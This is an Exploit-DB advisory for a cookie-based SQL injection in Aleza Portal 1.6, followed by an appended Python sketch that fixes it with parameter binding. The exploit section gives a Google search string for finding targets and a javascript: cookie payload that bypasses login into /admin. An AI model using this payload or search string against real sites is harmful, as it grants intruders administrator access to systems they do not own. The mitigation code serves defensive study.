Aleza Portal 1.6 - Insecure SQL Injection / Cookie Handling

EDB-ID: 15144
CVE: N/A
Author: KnocKout
Type: webapps
Platform: Windows
Date: 2010-09-28



Aleza Portal v1.6 - Insecure (SQLi) Cookie Handling 
=========================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout 
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Aleza Portal v1.6
~Software: http://www.webavail.com/
-Demo : http://www.webavail.com/alezademo/
~Vulnerability Style : (SQLi) Cookie Handling
~Google Keywords : Copyright 2001 WebAvail Productions, Inc. All Rights Reserved.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ~~~~~~~~ Exploitation ~~~~~~~~~~~

    Cookie injection from the browser: a javascript: URI sets the alezalogin cookie to a SQLi payload
    ================================
    javascript:document.cookie="alezalogin=login='or'level=11&pass='or';path=/";
    ================================
          [+]  Exploitable Browser Injected!

          [+]   Go to : http://[Victim]/admin
          
      
      GoodLucK ;)
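
Mitigation sketch, added here as an example (not code from the advisory or from Aleza Portal): the alezalogin cookie is parsed into its login/pass subkeys and the lookup uses a bound parameter, so the cookie value above is compared as literal data and authentication fails. Assumptions: the application's real query is not shown on this page, so the users table, its column names, the PBKDF2 password storage, level 11 as the admin level and the use of sqlite3 are all hypothetical.

```python
import hashlib
import hmac
import sqlite3

COOKIE_NAME = "alezalogin"  # cookie name from the advisory


def parse_login_cookie(cookie_header):
    """Return (login, pass) from the alezalogin cookie, or None if absent."""
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name == COOKIE_NAME:
            # Subkeys are '&'-separated key=value pairs, as in the advisory.
            fields = dict(p.partition("=")[::2] for p in value.split("&"))
            if "login" in fields and "pass" in fields:
                return fields["login"], fields["pass"]
    return None


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def authenticate(conn, cookie_header):
    """Return the account level for valid credentials, else None."""
    creds = parse_login_cookie(cookie_header)
    if creds is None:
        return None
    login, password = creds
    # Bound parameter: the cookie value is compared as data, never parsed as SQL.
    row = conn.execute(
        "SELECT salt, pass_hash, level FROM users WHERE login = ?", (login,)
    ).fetchone()
    if row is None:
        return None
    salt, pass_hash, level = row
    ok = hmac.compare_digest(hash_password(password, salt), pass_hash)
    return level if ok else None


def demo_db():
    """Constructed sample data: one account in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT PRIMARY KEY, salt BLOB,"
                 " pass_hash BLOB, level INTEGER)")
    salt = b"constructed-salt"
    conn.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
                 ("admin", salt, hash_password("s3cret-demo", salt), 11))
    return conn
```

Parameter binding closes the injection, but credentials held in a client-writable cookie remain a design weakness; an opaque server-side session identifier issued after login avoids it.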